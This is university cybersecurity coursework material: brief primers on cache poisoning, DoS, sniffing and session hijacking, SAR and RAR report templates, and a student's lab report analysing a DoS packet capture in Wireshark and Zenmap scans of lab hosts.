It may appear problematic to use this attack as a universal techique for cache poisoning. It’s due to cache server’s different connection model and request proccessing implementations. What does it mean? That for example effective method to poison Apache 2.x cache with mod_proxy and mod_cache modules won’t work with Squid.
A different problem is the length of the URI, which sometime makes it impossible to put the necessary response header, which would next be matched to the request for the poisoned page.
The request examples used are from http://packetstormsecurity.org/papers/general/whitepaper_httpresponse by Amit Klein, Director of Security and Research, which were modified on the needs of the article.
https://leocontent.umgc.edu/content/dam/permalink/628bca10-daf7-4ad7-b60e-2f2303211374.html?ou=722335
https://leocontent.umgc.edu/content/dam/permalink/e1609fda-c5b2-4eab-8299-bcb78e0a8721.html?ou=722335
Denial-of-Service Attacks (DoS)
Denial-of-service (DoS) attacks are cyberattacks aimed at making resources (or services) unavailable to users. DoS attacks are implemented through either the exploitation of limitations of communication and application protocols, or an attack on the server involving the transmission of an extensive number of requests meant to overload the server and exhaust its resources.
DoS attacks and their detection are discussed in the guidelines document of the National Institute of Standards and Technology (Scarfone & Hoffman, 2009). They typically lead to significantly increased bandwidth usage or a much larger-than-usual number of packets or connections sent to or from a particular host. Anomaly detection methods can involve monitoring bandwidth or packet or connection numbers and determining whether observed activity is significantly different from expected activity.
The effects of DoS attacks can be mitigated with the installation of appropriate software and the throttling of bandwidth usage.
References
Scarfone, K., & Hoffman, P. (2009).
Guidelines on firewalls and firewall policy: Recommendations of the National Institute of Standards and Technology: Special Publication 800-41. National Institute of Standards and Technology. http://csrc.nist.gov/publications/nistpubs/800-41-Rev1/sp800-41-rev1
Packet Analysis/Sniffing
Sniffing is performed by packet sniffers or network analysers, which monitor data streams and capture packets for decoding and examination.
According to the National Institute of Standards and Technology (NIST):
Packet sniffers are designed to monitor network traffic on wired or wireless networks and capture packets. Packet sniffers generally can be configured [to direct] the sniffer to capture all packets or only those with particular characteristics (e.g., certain TCP ports, certain source or destination IP addresses). Most packet sniffers are also protocol analyzers, which means that they can reassemble streams from individual packets and decode communications that use any of hundreds or thousands of different protocols (Mell et al., 2005).
Packet sniffing is performed for several beneficial purposes, which include identifying suspicious activities, finding corrupted or erroneous packets, and analyzing and improving system efficiency. It is, however, also used by hackers for attacking, spying, and collecting information.
References
Mell, P., Kent, K., & Nusbaum, J. (2005).
Guide to malware incident prevention and handling: Recommendations of the National Institute of Standards and Technology. (Special Publication 800-83). National Institute of Standards and Technology. US Department of Commerce. http://csrc.nist.gov/publications/nistpubs/800-83/SP800-83
Session Hijacking Attacks
When an attacker obtains unauthorized access to a user’s session ID or key, the attacker is able to masquerade as the user to access websites. This process is known as session hijacking. The session ID is stored in the cookie and can be stolen using several methods, including sniffing, software codes, and Trojans.
Though it is not easy to identify session hijacking attacks, users can take some precautions to prevent it. Some common steps include using sessions with secure SSL certificates, setting timeouts for sessions, and preventing JavaScripts from accessing session cookies.
Man-in-the-Middle Attack
Distributed Denial-of-Service Attacks
Like denial-of-service (DoS) attacks, distributed denial-of-service (DDoS) attacks are cyberattacks that intend to exhaust network resources. DDoS attacks, however, are launched from several (possibly hundreds or thousands of) devices, which are connected to each other, but distributed over the internet. Hence, a large number of devices simultaneously attack the network infrastructure (as opposed to the single device used in DoS attacks).
Common types of DDoS attacks include bandwidth, traffic, and application attacks. DDoS attacks are harder to prevent and mitigate than DoS attacks, as the multiple attack sources create a large volume of traffic in a short period of time.
In identifying the different threats, complete the following tasks:
1. Identify the potential hacking actors of these threat attacks on vulnerabilities in networks and information systems, as well as the types of remediation and mitigation techniques available in your industry and for your organization.
2. Identify the purpose and function of firewalls for organization network systems and how they address the threats and vulnerabilities you have identified.
3. Discuss the value of using access control, database transaction, and firewall log files.
4. Identify the purpose and function of encryption as it relates to files, databases, and other information assets on the organization’s networks.
Include these in your SAR.
Step 7: Risk and Remediation
What is the risk and what is the remediation? What is the security exploitation? You can use the OPM OIG
Final Audit Report findings and recommendations as a possible source for methods to remediate and mitigate vulnerabilities.
Read this
risk assessment
resource to get familiar with the process, then prepare a risk assessment. Be sure to first list the threats, then the vulnerabilities, and then the pairwise comparisons for each threat and vulnerability. Then determine the likelihood of each event occurring and the level of impact it would have on the organization.
Include this in your risk assessment report (RAR).
Step 8: Creating the SAR and RAR
Your research and your Workspace exercise have led you to this moment: creating your SAR and RAR. Consider what you have learned in the previous steps as you create your reports for leadership.
Prepare a Security Assessment Report (SAR) with the following sections:
1. Purpose
2. Organization
3. Scope
4. Methodology
5. Data
6. Results
7. Findings
The final SAR does not have to stay within this framework and can be designed to fulfill the goal of the security assessment.
Prepare a risk assessment report (RAR) with information on the threats, vulnerabilities, likelihood of exploitation of security weaknesses, impact assessments for exploitation of security weaknesses, remediation, and cost/benefit analyses of remediation.
Devise a high-level plan of action with interim milestones (POAM) in a system methodology to remedy your findings.
Include this high-level plan in the RAR.
Summarize the results you obtained from the OpenVAS vulnerability assessment tool in your report.The deliverables for this project are as follows:
1. Security Assessment Report (SAR): This should be an eight- to 10-page double-spaced Word document with citations in APA format. The page count does not include figures, diagrams, tables, or citations.
2. Risk Assessment Report (RAR): This report should be a five- to six-page double-spaced Word document with citations in APA format. The page count does not include figures, diagrams, tables, or citations.
3. Lab: In a Word document, share your lab experience and provide screenshots to demonstrate that you performed the lab.
image2
image1
Project 2 – Assessing Information System Vulnerabilities and Risk
Security Assessment Report (SAR)
CST 610: Cyberspace and Cybersecurity Foundations
{Your Name}
[date]
Professor\– Section
University
SECURITY ASSESSMENT REPORT
TISTA Science & Technology CorporationScience and Technology
[Period of Assessment]
[Report Date]
SECURITY ASSESSMENT
1.
Background
1.1 Purpose [Use the lead-in material from Project 2 “Start Here” and the project summary scenario to clearly focus the goal and purpose of the SAR]
1.2 Description of TISTA Science & Technology Corporation
1. Describe your company.
·
Mission: To deliver the highest quality IT professional services and innovative solutions to the Federal, State, and Local government.
· TISTA Science & Technology Corporationa wide-range of services, including Application Engineering, Consulting, Cybersecurity, Data Science, Infrastructure, and Mobility support, in the Health, Defense, and Civilian sectors.
2. What is business sector and how does that effect your security?
· Science and Technology
·
3.
How might the organizational structure of your company effect security?
1.3 Networks in TISTA Science & Technology Corporation
[Base the description of your network and the critical information systems you decide to include, on your work in Step 1.] Particularly as they apply to the company’s relational data base management system (RDBMS) here are areas and questions that you might include:
1. Provide network architecture diagrams for the local area network (LAN) and wide area network (WAN) for your company.
2. Indicate the critical information systems in these diagrams and explain their importance.
3. What external systems and users connect to your company?
4. Where is data at rest, in motion and in use?
5. Can you identify important system and network security boundaries and regions?
6.
Discuss the security benefits and deficiencies of your chosen network design. (Include tables and diagrams as appropriate) [Your focus should be on the RDBMS and systems, connectivity, auditing, protection, such as encryption and access control, … related to the RDBMS applications]
2.
Assessment Approach
[You have been asked whether the OPM breach could happen at your company. Describe the approach to your assessment based on the security posture of your company from the above description and the lab testing and comparing that to the threats encountered in the OPM breach.]
2.1 Approach
2.2 Review of the OPM Breach(s)
2.3
Relevance of OPM Breach(s) to [Your Company Name]
2.4 Completed or In Progress Assessments (i.e., simply identify your current and prior lab tests in this and prior classes and any prior SAR completed for this company. Do not include results here.)
2.5 Scope Covered in the Assessment (include why)
3. Assessment Results[footnoteRef:1] [1: For critical system(s), information, networks and interfaces to external systems and users.]
3.1 Insider Threats
Threat
Synopsis
Impact[footnoteRef:2] [2: Quantify or provide recent relevant examples or incidents of business, safety, health… impact.]
3.2 External Threats
Threat
Synopsis
Impact2
Impact Level (H,M,L)
3.3 Vulnerabilities[footnoteRef:3] [3: Include results from all lab testing (e.g., network monitoring and assessment and prior OS assessments and password cracking assessments. Provide details including tools in Synopsis and Lab Reports in Appendices.]
Vulnerability
Synopsis
Impact2
Impact Level (H,M,L)
4. Assessment Results
4.1 Rank Ordered Threats and Vulnerabilities (Most to Least Impact)
ID[footnoteRef:4] [4: ID: You may wish to label categories as S=System, N=Network, I=Interface, D=Data or Information and give number in each category (e.g., S1, S2, N1, D1) for unambiguous referencing.]
Impact Level (H,M,L)
Threat or Vulnerability1
Current Security Posture
Deficiencies in Current Posture
5. Notes and Comments
______________________________ _________________
Principle Assessor Date
[Enter your name and date as would be done in a real SAR.]
SUMMARY OF REFERENCES
Provide your summary list of references using proper APA format. (Remember: You must also use in-line citations with proper APA format throughout the report.)
APPENDICES
Place your lab report and screenshots here.
[The lab is to be treated as your specific testing and checking out of your company’s critical information systems and the topics you are writing about. It is not a theoretical exercise. Nor is it independent of and separate from our topic and scenario. Provide screenshots of the tools and results from your lab experiences, as well as answer any lab questions. Many students take the lab directions, eliminate everything but the section headings and questions and in each section write down what was asked for, what the results would show, how they relate to a topic in the main report, enter the screenshots obtained and point to or write out the specific key data result(s) within the screenshot.
Your specific insights, comparisons and results from the analysis of the lab data should be identified and used within the report and tables, above.
Note: A great tool for capturing your screenshots from the lab is MS SnipIt which is installed on MS Windows computers.]
Page 5 of 6
Project 2 – Assessing Information System Vulnerabilities and Risk
Risk Assessment Report (RAR)
CST 610: Cyberspace and Cybersecurity Foundations
{Your Name}
[date]
Professor – Section
University
RISK ASSESSMENT REPORT
TISTA Science & Technology CorporationScience and Technology
[Period of Assessment]
[Report Date]
RISK ASSESSMENT
[Note: Parts of the RAR will normally contain material found in the SAR. Feel free to reuse that SAR material, as is, here.]
1.
Background[footnoteRef:1] [from the SAR] [1: Reference Security Assessment Report for Background.]
1.1 Purpose [Use the lead-in material from Project 2 “Start Here” and the project summary scenario to clearly focus the goal and purpose of the SAR]
1.2 Description of TISTA Science & Technology Corporation
1. Describe your company.
·
Mission: To deliver the highest quality IT professional services and innovative solutions to the Federal, State, and Local government.
· TISTA Science & Technology Corporation provides a wide-range of services, including Application Engineering, Consulting, Cybersecurity, Data Science, Infrastructure, and Mobility support, in the Health, Defense, and Civilian sectors.
2. What is business sector and how does that effect your security?
· Science and Technology
·
3.
How might the organizational structure of your company effect security?
1.3 Networks in TISTA Science & Technology Corporation
[Base the description of your network and the critical information systems you decide to include, on your work in Step 1.] Particularly as they apply to the company’s relational data base management system (RDBMS) here are areas and questions that you might include:
1. Provide network architecture diagrams for the local area network (LAN) and wide area network (WAN) for your company.
2. Indicate the critical information systems in these diagrams and explain their importance.
3. What external systems and users connect to your company?
4. Where is data at rest, in motion and in use?
5. Can you identify important system and network security boundaries and regions?
6.
Discuss the security benefits and deficiencies of your chosen network design. (Include tables and diagrams as appropriate) [Your focus should be on the RDBMS and systems, connectivity, auditing, protection, such as encryption and access control, … related to the RDBMS applications]
2.
Risk Assessment Approach
2.1 Risk Assessment Methods
Method
Synopsis
2.2 Model(s) and Method(s) Employed
Include:
· Reference standards and industry best practices, models and methods employed.
· Diagrams and/or tables showing risks will be presented for executives and others
· How risks will be quantified
· The probabilities of insider and external threats occurring and the probabilities of them being successful incidents relative to technical and physical vulnerabilities to critical system(s), information, networks and interfaces to external systems and users.
· The business impact of the threats.
3. Assessment Results1,[footnoteRef:2] [2: For critical system(s), information, networks and interfaces to external systems and users. Reference Security Assessment Report for threats and vulnerabilities.]
3.1 Insider Threats
Threat1
Synopsis
Impact
Probability
3.2 External Threats
Threat1
Synopsis
Impact
Probability
3.3 Vulnerabilities
Vulnerability1
Synopsis
Impact
Probability
4. Assessment Results
4.1 Rank Ordered Risk Levels (Highest to Lowest)
ID[footnoteRef:3] [3: ID: You may wish to label categories as S=System, N=Network, I=Interface, D=Data or Information and give number in each category (e.g., S1, S2, N1, D1) for unambiguous referencing.]
Risk Level
Threat or Vulnerability1
Current Security Posture
Potential Security Measures
Estimated Cost of Each
4.2 Plan of Action with Interim Milestones (POAM)
[Summarize your recommended high-level plan of action to remedy your findings in the order to be addressed in the table.]
Risk ID2
Risk Level
Threat or Vulnerability1
Recommended Security Measure
Estimated Cost
Risks Involved in Implementation
5. Notes and Comments
______________________________ _________________
Principle Assessor Date
SUMMARY OF REFERENCES
Provide your summary list of references using proper APA format. (Remember: You must also use in-line citations with proper APA format throughout the report.)
Page 5 of 7
CST Lab Experience Report
Use this lab experience report template to document your findings from the lab and make sure to complete all required actions in each step of the lab and respond to all questions. The template is designed to be used as a guide for your lab and not necessarily a project requirement.
ADDITIONAL LAB GUIDANCE
Below is a list of additional guidance and/or recommendations for your lab experience report:
· Completing the labs: All sections or parts of the labs should be completed as required.
· Answering the lab questions: You are required to answer all the lab questions (if any).
· Taking screenshots: While taking screenshots is recommended in your lab, try to limit them and only focus on the applicable ones to support your lab report.
· Writing your lab experience report: You are required to write a summary of the lab experience report based on your findings and incorporate them into your final deliverables.
· File name convention: Please change the generic file name of this template to reflect part of your name, the course ID, or the project/lab title.
· e.g. 1:
CST610 Project 2 Lab-Network Traffic Capture and Analysis
· e.g. 2:
CST610 Project 2 Lab-Network Traffic Capture and Analysis—John Doe
· e.g. 3:
CST610-Project 2 Lab_Network Traffic Capture and Analysis (7/15/22)
In compiling your findings, think of how your experience performing the labs is related to the overall project goals. You are required to collect information from the lab to understand potential vulnerabilities and other security challenges, analyze, create your lab report, and incorporate key components in the final project report.
Please do well to pay attention to each item above and use it as a supplemental guide besides the project requirements. Finally, note that successfully completing the lab is important for achieving the overall project goals.
THE REQUIRED LAB QUESTIONS
Acting as a security operations analyst in this lab, the CIO wanted you to analyze the network packets that were captured and investigate the potential target hosts, inbound and outbound traffic, and the specific types of attacks such as DDoS or SQL injection. Additionally, you were asked to include in your findings whether this is an active or passive sniffing attack. It is imperative to get a deeper understanding of network security concepts by capturing and analyzing network packets traversing through specified endpoints or networks. In other words, you have gained hands-on experience running vulnerability analysis tools that can help detect potential weaknesses in a system. Based on the knowledge and experience gained from the lab, answer the following questions.
PART 2—
TASK 4: Filtering, Inspecting, and Analyzing Packet Capture with Wireshark
1. Think of the fact that a DoS attack tries to make a web resource unavailable to legitimate users by flooding the target URL/host with more requests to overwhelm the server. What can you infer from the statistical information in the Destination and Ports window as far as a DoS attack is concerned?
Figure 1.
Destinations and Ports for 192.168.10.111
Figure 2
Destinations and Ports for 192.168.10.101
A denial-of-service attack involves denying legitimate users from accessing systems and or data, by flooding the system with heavy loads of erroneous traffic that occupies a majority of the computer’s available resources (Ferguson, 2021). Figures 1 and Figures 2 show a large volume of packets, over 40k for 192.168.10.101 and nearly 1.9 million for 192.168.10.111. What I infer from the high count on the Destination and Ports, is that an active DOS attack is underway.
2. Cybercriminals can illegitimately use DoS attacks to extort money from companies. They may also use ransomware vis social engineering. Determine if this is a Distributed Denial of Service (DDoS) or DoS attack [hint: a DDoS attack originates from multiples sources almost simultaneously].
Figure 3
Destinations and Ports
Figure 3 indicates that 192.168.10.111 and 192.168.10.101 both have large volumes of packets. 192.168.10.111 is the host IP address and 192.158.10.101 is the source of the attack. This is a DOS attack and not a DDos attack. If it were a DDoS attack, we would see many originating addresses and one recipient (Fidele, 2020).
3. What is your point of view of the
Rate and
Percent columns of the
Statistics output with respect to the
Count column? Does this information indicate any possibility of a compromise? If so, why?
These rates and statistics can point us to the targeted ports and addresses. In Figure 1, 100% of the packets are on 192.168.10.111, UDP using port 50 and 99.75% of the packets are TCP on port 80. These results show that UDP port 50 and TCP port 80 on the host IP are the target of this DOS attack.
4. Besides the DDoS attack, do you see any indication of any attack such as brute force, SQL injections attack upon analyzing the web traffic? Why or why not?
Figure 4
Password
The traffic does not indicate a brute force attack. There were multiple requests for recovering passwords as shown in figure 4. Each request returned with an HTTP/1.1 404 not found. The URL not being found could mean that the server is offline or unreachable due to the DOS attack. SQL injection involves exploiting weaknesses in the SQL code by injecting faulty code in the query. Looking at the GET requests, I did not see the indicative 1=1 or 1=2, and Boolean commands, or any other URL manipulation.
5. How is this indication different from the
Statistics information retrieved earlier and from the perspective of this attack?
Figure 5
Conversations Menu
Figure 5 shows that 192.168.10.101 sent more than 1.9 million packets to 192.168.10.111. The Conversation menu does not show the ports. In this menu you can also look at UDP and TCP independently from each other. Conversations menu indicates who the source and the destination are, Destination and Ports menu does not.
6. What legitimate or illegitimate role does the host/user with the 192.168.10.111 IP address play in the suspected attack?
The data indicates that 192.168.10.101 initiated the attack by sending illegitimate packet traffic to 192.168.10.111. The attacker is on the same network, so the host’s role is to reply to the packet request, which in turn floods the server with illegitimate traffic, overloading it, thereby denying legitimate in the system.
7. If malicious actors got into your network to access your network security logs, how could they use the packet details to their advantage? Specifically, what utilities within Wireshark can you count on?
From the packet details, a bad actor could learn that we are vulnerable through Telnet, which is unsecure, and they may choose to exploit that. It is also possible that these packet details may also include usernames and or passwords (Grimmick, 2021). We can count on Wireshark’s ability to sniff out and capture these intrusions, so that we may harden our security posture to prevent future attacks and to mitigate present threats.
8. From the details of the packet details pane above, why do you think there are several ICMP destination ports unreachable? Does this suggest an indication of an attack? Please comment on your observations.
Figure 6
ICMP
Figure 6 indicates a large volume of ICMP requests, resulting in “destination unreachable (Port unreachable)”. This is indicative of a DOS attack (Firch, 2021). The requests are pings to check of the port is open or closed, the sheer volume is what defines a DOS attack and slows the system.
RT 2—TASK 5, 6: Scanning Multiple Hosts and Networks with Zenmap
1. What is your opinion about the results and the security implications of the output of this tab? Comment on the data of interest in your findings such as host status and ports used.
Figure 7
Ports/Host
The security implications here are concerning. From the results, a bad actor can ascertain the, which ports are open, protocols used, and services as shown above. Port 22 is wide open with SSH which is a vulnerability we found in the first project. A potential attacker could use this data to determine our vulnerabilities and exploit them.
2. How many ports are reported by the scans, and how more so many are open ports?
Figure 8
Ports Open
Figure 8 shows 1000 ports scanned in total and 12 of them are open.
3. What is one most impactful security vulnerability in your opinion? Recommend a good mitigation strategy to address any vulnerabilities identified.
Having Port 22 open for Open SSH Windows 7.7 is concerning. It is prone to user enumeration vulnerability. By exploiting this, a valid username can be ascertained through sort of brute for attempt. Once a valid username is found, the bad actor can simply brute force the password (Pankov, 2020). If not in use, disabling public key authentication is a good mitigation step. It is also a good idea to often scan the system for signs of this taking place. OpenVAS can also scan and will provide recommended steps.
4. What can you say about the results when scanning multiple hosts and/or a subnet compared with the individual host scans?
Figure 9 Figure 10
Single Host Scan Multiple Host Scan
Figure 11 Figure 12
Ping Single Host Subnet Ping
The results from individual host scans vs multiple host scans differ in topology, shown in figure 9 and 10 above. Latency is pretty similar between them. The scan of Subnet KALI Linux shows, out of 1000 ports, 4 are open, figure 12 above. The Windows VM has 12 open ports, Figure 11.
5. Recommend a good mitigation strategy to address any vulnerabilities identified.
I like both Nessus and OpenVAS, for our Windows Machines Nessus will work fine as an off-the-shelf, ready to go tool. Our SAP/Linux machines which are highly customized, I would choose OpenVAS as we can customize it to fit our needs. These two tools together with frequent scans are a good strategy to find and address our vulnerabilities.
6. In your opinion, why are some hosts reported as down? Do you recognize any security concerns? [Hint: use the ping utility to see if any IP within the range is reachable from the Windows machine].
I believe some hosts are reporting as down due to a lack of subnetting, which is concerning. The network topology and IP scheme, can be set up to separate and isolate subnets, both for business reasons, e.g., separating Human Resources, Accounting, and Production departments. But this is also ideal to isolate and mitigate attacks so that they don’t spread across the entire system (Menon, 2022). You can also set rules to limit traffic between subnets.
NOTE
: Proceed to the next page and use the space provided to compile a summary of your lab experience report. Use additional space as necessary to complete the report.
SUMMARY OF YOUR LAB EXPERIENCE REPORT
Use the space below to summarize your lab experience report based on your findings from the lab, making sure to complete all required actions in each step of the lab and respond to all questions. Be sure to incorporate key part of your findings in your final project report for submission to your professor. You may use additional space as necessary to complete the lab.
During this lap, we utilized packets captured in the form of PCAP file to analyze the network traffic on the day of the attack. It is clear after analyzing the traffic that two IP addresses (192.168.10.101 and 192.168.10.111) had a very large volume of traffic between them. IP address 192.168.10.101 was the obvious source of the traffic, and the recipient was 192.168.10.111, with over 1.9 million packets sent between them. This is a clearcut case of a DOS attack, not a DDOS attack, which would involve multiple source machines, here we have only the one source. We know that both machines are on the same network and subnet. The data also revealed a flood of ICMP requests due to the DOS attack. Being on the same network means that either a user’s credentials or machine were compromised or this could be an insider attack. NMAP was used to scan network machines revealing only one open host, indicating a lack of subnetting to separate departments within the network. We also discovered OpenSSH port 22 is open, leaving the network vulnerable to user enumeration.
References
Fidele, K. A., Suryono, & Sayafei (2020).
Denial of Service (DoS) attack identification and analyse using sniffing technique
in the network environment. E3S Web of Conferences,
202(15003).
https://doi.org/10.1051/e3sconf/202020215003
Firch, J. (2021). How To Prevent A ICMP Flood Attack. PurpleSec. Retrieved from https://purplesec.us/prevent-pingattacks/
Ferguson, K. (2021).
denial-of-service attack. TechTarget. Retrieved from
https://www.techtarget.com/searchsecurity/definition/denial-of-service#:~:text=A%20denial%2Dof%2Dservice
%20(,information%20technology%20(IT)%20resources.
Grimmick, R. (2021). Packet Capture: What is it and What You Need to Know. Retrieved from
https://www.varonis.com/blog/packet-capture
Menon, K. (2022). Best Guide To Understand The Importance Of What Is Subnetting. Retrieved from
https://www.simplilearn.com/tutorials/cyber-security-tutorial/what-is-sub-netting
Pankov, N. (2020). Enumeration attack dangers. Kapersky. Retrieved from https://www.kaspersky.com/blog/usernameenumeration-attack/34618/
2
image1
image2
image3
image4
image5
image6
image7
image8
image9
image10
image11
image12
image13